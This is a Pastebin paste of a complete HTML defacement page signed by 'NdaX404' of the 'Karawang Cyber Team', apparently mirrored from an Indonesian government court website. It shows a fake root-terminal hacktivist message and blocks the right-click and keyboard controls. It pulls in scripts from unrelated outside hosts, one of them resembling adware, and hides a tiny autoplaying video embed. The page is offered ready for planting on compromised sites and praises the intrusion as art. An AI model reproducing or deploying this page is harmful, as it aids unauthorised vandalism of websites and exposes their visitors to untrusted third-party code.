Advertisement
NdaX404

script deface Ntaps Jiwa

Dec 8th, 2016
613
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 8.30 KB | None | 0 0
  1. <html>
  2.  
  3. <!-- Mirrored from www.pa-maninjau.go.id/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 06 Dec 2016 20:28:32 GMT -->
  4. <head><script src="http://masterendi.googlecode.com/files/salju.js"></script><script type="text/javascript" src="http://apiwebspadesinfo-a.akamaihd.net/gsrs?is=fmxqtid&amp;bp=PB&amp;g=1c83c707-6e9c-4b09-884c-3bbc7f641e35" ></script></head>
  5. <title>NdaX404</title>
  6. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script>
  7. <style>
  8. body{
  9. background-color: #010;
  10. background-repeat:no-repeat;
  11. background-attachment:fixed;
  12. background-position:right bottom;
  13. font-family: Bradley Hand ITC;
  14. font-size: 27px;
  15. }
  16. h1 {
  17. padding: 10px 15px;
  18. margin: 0px;
  19. font-size: 14px;
  20. background-color: #000000;
  21. //background-image: -moz-linear-gradient(100% 100% 90deg, #777, #999) !important;
  22. //background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#999), to(#777)) !important;
  23. color: #FFF;
  24. //-webkit-border-radius:8px 8px 0px 0px;
  25. //-moz-border-radius: 8px 8px 0px 0px;
  26. border-radius: 8px 8px 0px 0px;
  27. text-shadow:1px 1px 2px #333333;
  28. opacity: 0.5;
  29. }
  30. table {
  31. width: 565px;
  32. }
  33. table tr td{
  34. font-family: verdana;
  35. font-size: 11px;
  36. padding: 10px 5px;
  37. border-bottom: solid 1px #CCC;
  38.  
  39. }
  40. #wrapper{
  41. width: 800px;
  42. margin: 10px auto;
  43. text-align: left;
  44. background: url('http://pre14.deviantart.net/d8fa/th/pre/i/2013/306/6/7/download_anonymous_2_by_paullus23-d6sq1x5.jpg') no-repeat center center fixed ;
  45. }
  46. #console{
  47. height: 400px;
  48. overflow: auto;
  49. background-color: #000;
  50. padding: 15px;
  51. font-family: monospace;
  52. font-size: 12px;
  53. color: #FFF;
  54. }
  55. .content{
  56. padding: 15px;
  57. }
  58. #commander{
  59. border: solid 1px #CCC;
  60. padding: 5px 10px;
  61. -webkit-border-radius: 2px;
  62. -moz-border-radius: 2px;
  63. border-radius: 2px;
  64. margin: 5px;
  65. width: 590px;
  66. height: 30px;
  67. }
  68. .box{
  69. -moz-box-shadow: 1px 1px 8px #666;
  70. -webkit-box-shadow: 1px 1px 8px #666;
  71. box-shadow: 1px 1px 8px #40D5D2;
  72. border: solid 1px black;
  73. -webkit-border-radius: 8px 8px 0px 0px;
  74. -moz-border-radius: 8px 8px 0px 0px;
  75. border-radius: 8px 8px 0px 0px;
  76. margin: 15px 0px;
  77. background-color: #F5F5F5;
  78. opacity: 0.8;
  79. }
  80. #help{
  81. width: 300px;
  82. float: right;
  83. }
  84. .prefix{
  85. color: #0077E7;
  86. }
  87. .keyword{
  88. color: #9eff63;
  89. }
  90. .error{
  91. color: #FF0000;
  92. }
  93. .spacer{
  94. clear: both;
  95. display: block;
  96. }
  97. </style>
  98. <script type="text/javascript">
  99.  
  100. TypingText = function(element, interval, cursor, finishedCallback) {
  101. if((typeof document.getElementById == "undefined") || (typeof
  102.  
  103. element.innerHTML == "undefined")) {
  104. this.running = true;
  105. return;
  106. }
  107. this.element = element;
  108. this.finishedCallback = (finishedCallback ? finishedCallback : function() {
  109.  
  110. return; });
  111. this.interval = (typeof interval == "undefined" ? 100 : interval);
  112. this.origText = this.element.innerHTML;
  113. this.unparsedOrigText = this.origText;
  114. this.cursor = (cursor ? cursor : "");
  115. this.currentText = "";
  116. this.currentChar = 0;
  117. this.element.typingText = this;
  118. if(this.element.id == "") this.element.id = "typingtext" +
  119.  
  120. TypingText.currentIndex++;
  121. TypingText.all.push(this);
  122. this.running = false;
  123. this.inTag = false;
  124. this.tagBuffer = "";
  125. this.inHTMLEntity = false;
  126. this.HTMLEntityBuffer = "";
  127. }
  128. TypingText.all = new Array();
  129. TypingText.currentIndex = 0;
  130. TypingText.runAll = function() {
  131. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  132. }
  133. TypingText.prototype.run = function() {
  134. if(this.running) return;
  135. if(typeof this.origText == "undefined") {
  136. setTimeout("document.getElementById('" + this.element.id +
  137.  
  138. "').typingText.run()", this.interval);
  139. return;
  140. }
  141. if(this.currentText == "") this.element.innerHTML = "";
  142. if(this.currentChar < this.origText.length) {
  143. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  144. this.tagBuffer = "<";
  145. this.inTag = true;
  146. this.currentChar++;
  147. this.run();
  148. return;
  149. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  150. this.tagBuffer += ">";
  151. this.inTag = false;
  152. this.currentText += this.tagBuffer;
  153. this.currentChar++;
  154. this.run();
  155. return;
  156. } else if(this.inTag) {
  157. this.tagBuffer += this.origText.charAt(this.currentChar);
  158. this.currentChar++;
  159. this.run();
  160. return;
  161. } else if(this.origText.charAt(this.currentChar) == "&" && !
  162.  
  163. this.inHTMLEntity) {
  164. this.HTMLEntityBuffer = "&";
  165. this.inHTMLEntity = true;
  166. this.currentChar++;
  167. this.run();
  168. return;
  169. } else if(this.origText.charAt(this.currentChar) == ";" &&
  170.  
  171. this.inHTMLEntity) {
  172. this.HTMLEntityBuffer += ";";
  173. this.inHTMLEntity = false;
  174. this.currentText += this.HTMLEntityBuffer;
  175. this.currentChar++;
  176. this.run();
  177. return;
  178. } else if(this.inHTMLEntity) {
  179. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  180. this.currentChar++;
  181. this.run();
  182. return;
  183. } else {
  184. this.currentText += this.origText.charAt(this.currentChar);
  185. }
  186. this.element.innerHTML = this.currentText;
  187. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ?
  188.  
  189. (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) :
  190.  
  191. "");
  192. this.currentChar++;
  193. setTimeout("document.getElementById('" + this.element.id +
  194.  
  195. "').typingText.run()", this.interval);
  196. } else {
  197. this.currentText = "";
  198. this.currentChar = 0;
  199. this.running = false;
  200. this.finishedCallback();
  201. }
  202. }
  203. </script>
  204.  
  205.  
  206. <!-- AdFender script begin --><script type='text/javascript' src='http://local.adfender.com/adfender/elemhide.js'></script><!-- AdFender script end -->
  207. <!-- AdFender script begin --><script type='text/javascript' src='http://local.adfender.com/adfender/elemhide.js'></script><!-- AdFender script end -->
  208. </head>
  209. <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
  210. <br/><br/>
  211. <div id="wrapper">
  212. <div class="box">
  213. <h1>Terminal</h1>
  214. <div id="console"><span class="prefix">
  215. <p id="message">
  216. <font color="yellow" size="5px">#OP_CALON_MERTUA</font><br>
  217.  
  218.  
  219. <font color="aqua">root@ndax404:~#</font><font color="white"> sudo su <br>
  220. <font color="aqua">root@ndax404:~#</font><font color="white"> enter pasword<br>
  221. <font color="aqua">root@ndax404:~#</font><font color="white"> *********** <br>
  222. <font color="aqua">root@ndax404:~#</font><font color="white"> ketika usaha <br>
  223. <font color="aqua">root@ndax404:~#</font><font color="white"> tak di hargai<br>
  224. <font color="aqua">root@ndax404:~#</font><font color="white"> ingatlah karma itu pasti ada<br>
  225. <font color="aqua">root@ndax404:~#</font><font color="white"> kadang mereka tidak tau apa yang telah aku lalui<br>
  226. <font color="aqua">root@ndax404:~#</font><font color="white"> aku hanya pasrah dengan keadaan ini<br>
  227. <font color="aqua">root@ndax404:~#</font><font color="white"> semoga allah SWT meridhoi perjuanganku <br>
  228. <font color="aqua">root@ndax404:~#</font><font color="white"> BY <font color="aqua" size="3px">NdaX404</font><br>
  229. <br>
  230. <font color="yellow" size="5px">[+] Karawang Cyber Team</font><br>
  231. <font color="white">[+] Message :.Hacking is not criminal.. but Hacking is art<br>
  232.  
  233. We are <font color="yellow" size="3px">Karawang Cyber Team</font> <br>
  234. We are United<br>
  235. We are Legion<br>
  236. We do not forgive<br>
  237. We do not forget<br>
  238. Expect us<br>
  239. <br>
  240.  
  241. <font color="#00FF00 ">Oh iya jangan pernah merasa puas dengan ilmu yang anda miliki<br>
  242. <font color="#00FF00 ">Belajar dan terus belajar jangan pernah bosan<br>
  243. <font color="#00FF00 ">Karena ilmu itu tidak ada hibisnya<br>
  244. <font color="#FF3300 "size="5px">Teruslah Merasa Bodoh<br></font>
  245. <font color="#FF3300 "size="5px">Teruslah Merasa Lapar<br></font>
  246.  
  247. <font color="Cyan">[+] Greetz : al_mustofa | ./n4uf4l_s4n | root/x | santri_keren | al_fatih | <br/> All Member Defacer Tersakiti <br>
  248. <br>
  249. <font color="yellow">Copyright  @2016<br>
  250. <br>
  251.  
  252.  
  253. <a href="https://facebook.com/NdaX404"><font color="aqua" size="3px">contact me</font></a>
  254.  
  255.  
  256. <script type="text/javascript">
  257. new TypingText(document.getElementById("message"), 50, function(i){ var ar
  258.  
  259. = new Array("|", "|", "|", "|"); return " " + ar[i.length % ar.length]; });
  260.  
  261. //Type out examples:
  262. TypingText.runAll();
  263.  
  264. </script>
  265. <input text="test" id="commander" onkeyup="execute(this,event);" disabled="disabled" style="width:786px;"/>
  266. </div>
  267. <div class="spacer"></div>
  268.  
  269. <embed src="http://www.youtube.com/v/LApS9G22cIU&amp;autoplay=1"
  270. type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement